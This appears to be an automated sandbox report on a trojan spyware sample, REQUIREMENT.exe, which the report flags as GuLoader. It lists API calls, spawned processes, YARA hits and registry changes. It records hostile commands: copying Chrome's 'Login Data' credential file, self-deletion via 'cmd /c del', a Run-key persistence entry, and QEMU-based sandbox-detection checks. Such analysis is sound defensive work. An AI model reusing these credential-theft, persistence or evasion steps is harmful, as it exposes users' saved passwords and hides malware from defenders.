Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2C30 NtMapViewOfSection,	27_2_1E9D2C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D3C30 NtOpenProcessToken,	27_2_1E9D3C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2C20 NtSetInformationFile,	27_2_1E9D2C20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2C50 NtUnmapViewOfSection,	27_2_1E9D2C50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2DA0 NtReadVirtualMemory,	27_2_1E9D2DA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2D50 NtWriteVirtualMemory,	27_2_1E9D2D50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2A80 NtClose,	27_2_1E9D2A80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2AA0 NtQueryInformationFile,	27_2_1E9D2AA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2AC0 NtEnumerateValueKey,	27_2_1E9D2AC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2A10 NtWriteFile,	27_2_1E9D2A10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2B80 NtCreateKey,	27_2_1E9D2B80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2BC0 NtQueryInformationToken,	27_2_1E9D2BC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2BE0 NtQueryVirtualMemory,	27_2_1E9D2BE0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2B00 NtQueryValueKey,	27_2_1E9D2B00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2B20 NtQueryInformationProcess,	27_2_1E9D2B20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D38D0 NtGetContextThread,	27_2_1E9D38D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D29D0 NtWaitForSingleObject,	27_2_1E9D29D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D29F0 NtReadFile,	27_2_1E9D29F0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D4570 NtSuspendThread,	27_2_1E9D4570
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D4260 NtSetContextThread,	27_2_1E9D4260
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_0056244F NtProtectVirtualMemory,	27_2_0056244F
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_0056B688 NtProtectVirtualMemory,	27_2_0056B688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_005676AD NtAllocateVirtualMemory,	27_2_005676AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	28_2_1E9C2DC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2D10 NtQuerySystemInformation,LdrInitializeThunk,	28_2_1E9C2D10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2B90 NtFreeVirtualMemory,LdrInitializeThunk,	28_2_1E9C2B90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	28_2_1E9C2B10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C34E0 NtCreateMutant,LdrInitializeThunk,	28_2_1E9C34E0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2E80 NtCreateProcessEx,	28_2_1E9C2E80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2EB0 NtProtectVirtualMemory,	28_2_1E9C2EB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2ED0 NtResumeThread,	28_2_1E9C2ED0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2EC0 NtQuerySection,	28_2_1E9C2EC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2E00 NtQueueApcThread,	28_2_1E9C2E00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2E50 NtCreateSection,	28_2_1E9C2E50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2FB0 NtSetValueKey,	28_2_1E9C2FB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2F00 NtCreateFile,	28_2_1E9C2F00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2F30 NtOpenDirectoryObject,	28_2_1E9C2F30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C3C90 NtOpenThread,	28_2_1E9C3C90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2CD0 NtEnumerateKey,	28_2_1E9C2CD0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2CF0 NtDelayExecution,	28_2_1E9C2CF0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2C10 NtOpenProcess,	28_2_1E9C2C10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C3C30 NtOpenProcessToken,	28_2_1E9C3C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2C30 NtMapViewOfSection,	28_2_1E9C2C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2C20 NtSetInformationFile,	28_2_1E9C2C20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2C50 NtUnmapViewOfSection,	28_2_1E9C2C50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2DA0 NtReadVirtualMemory,	28_2_1E9C2DA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2D50 NtWriteVirtualMemory,	28_2_1E9C2D50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2A80 NtClose,	28_2_1E9C2A80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2AA0 NtQueryInformationFile,	28_2_1E9C2AA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2AC0 NtEnumerateValueKey,	28_2_1E9C2AC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2A10 NtWriteFile,	28_2_1E9C2A10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2B80 NtCreateKey,	28_2_1E9C2B80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2BC0 NtQueryInformationToken,	28_2_1E9C2BC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2BE0 NtQueryVirtualMemory,	28_2_1E9C2BE0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2B00 NtQueryValueKey,	28_2_1E9C2B00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2B20 NtQueryInformationProcess,	28_2_1E9C2B20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C38D0 NtGetContextThread,	28_2_1E9C38D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C29D0 NtWaitForSingleObject,	28_2_1E9C29D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C29F0 NtReadFile,	28_2_1E9C29F0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C4570 NtSuspendThread,	28_2_1E9C4570
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C4260 NtSetContextThread,	28_2_1E9C4260
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_0056244F NtProtectVirtualMemory,	28_2_0056244F
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_0056B688 NtProtectVirtualMemory,	28_2_0056B688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_005676AD NtAllocateVirtualMemory,	28_2_005676AD

Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process Stats: CPU usage > 98%
Source: C:\Windows\explorer.exe	Process Stats: CPU usage > 98%

Source: REQUIREMENT.exe, 00000001.00000000.32469356192.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameStablerne.exe vs REQUIREMENT.exe
Source: REQUIREMENT.exe, 00000003.00000002.33045942706.00000000000D3000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamesystray.exej% vs REQUIREMENT.exe
Source: REQUIREMENT.exe, 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs REQUIREMENT.exe
Source: REQUIREMENT.exe, 00000003.00000000.32662741208.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameStablerne.exe vs REQUIREMENT.exe
Source: REQUIREMENT.exe	Binary or memory string: OriginalFilenameStablerne.exe vs REQUIREMENT.exe

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll

Source: REQUIREMENT.exe

ReversingLabs: Detection: 48%

Source: REQUIREMENT.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\REQUIREMENT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\REQUIREMENT.exe 'C:\Users\user\Desktop\REQUIREMENT.exe'
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process created: C:\Users\user\Desktop\REQUIREMENT.exe 'C:\Users\user\Desktop\REQUIREMENT.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\REQUIREMENT.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process created: C:\Users\user\Desktop\REQUIREMENT.exe 'C:\Users\user\Desktop\REQUIREMENT.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\REQUIREMENT.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'	Jump to behavior

Source: C:\Users\user\Desktop\REQUIREMENT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\REQUIREMENT.exe

File created: C:\Users\user\AppData\Local\Temp\~DFF5D9BCB1CA791CDF.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@26/3@58/32

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\systray.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: systray.pdb source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp
Source:	Binary string: systray.pdbGCTL source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: REQUIREMENT.exe, 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp, systray.exe, 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35658181746.000000001E950000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35788695940.000000001EA8D000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35829603529.000000001EA7D000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: certmgr3ff.exe

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.35598358285.00000000022C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.35818096692.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.35647851056.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.35540305146.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.35777303082.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00404C7B push eax; retf	1_2_00404C82
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00404619 push esp; retf	1_2_0040461A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00405035 push ss; retf	1_2_00405037
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00403ADA push ecx; retf	1_2_00403ADC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_0040528D push esp; retf	1_2_0040528E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_004044B5 push eax; retf	1_2_004044B6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00403B4B push ebp; retf	1_2_00403B4C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00405775 push eax; retf	1_2_00405779
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00404F2B push edi; iretd	1_2_00404F3A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B3E65 pushad ; ret	1_2_023B3E68
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B209B push ecx; ret	1_2_023B209C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B40EC push eax; retn 0010h	1_2_023B412E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B26CA push FFFFFF81h; ret	1_2_023B26CC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B42C3 push eax; ret	1_2_023B42D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B4125 push eax; retn 0010h	1_2_023B412E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B4B54 push ecx; ret	1_2_023B4B5A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B0792 push ds; ret	1_2_023B0794
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BA1C7 push eax; retf B6D8h	1_2_023BC7F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B13C7 push eax; retf	1_2_023B13C8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9697A1 push es; iretd	3_2_1E9697A8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9908CD push ecx; mov dword ptr [esp], ecx	3_2_1E9908D6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9621AD pushad ; retf 0004h	3_2_1E96223F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_0056CA6D push eax; retf	3_2_0056CA6F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049908CD push ecx; mov dword ptr [esp], ecx	13_2_049908D6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E6033 push ecx; ret	13_2_027E6034
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E363A push eax; ret	13_2_027E363B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027EB7FB push eax; ret	13_2_027EB862
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027EB7F2 push eax; ret	13_2_027EB7F8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027EB7A5 push eax; ret	13_2_027EB7F8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027DD45C push edx; iretd	13_2_027DD45B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027DD451 push edx; iretd	13_2_027DD45B

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\Aidr0p8lx\certmgr3ff.exe

Jump to dropped file

Source: C:\Program Files\Mozilla Firefox\firefox.exe

Code function: 21_2_000001E92741A4B2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,

21_2_000001E92741A4B2

Source: C:\Windows\SysWOW64\systray.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run S610FPS8_B7			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run S610FPS8_B7			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\systray.exe	Process created: /c del 'C:\Users\user\Desktop\REQUIREMENT.exe'
Source: C:\Windows\SysWOW64\systray.exe	Process created: /c del 'C:\Users\user\Desktop\REQUIREMENT.exe'			Jump to behavior

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\REQUIREMENT.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
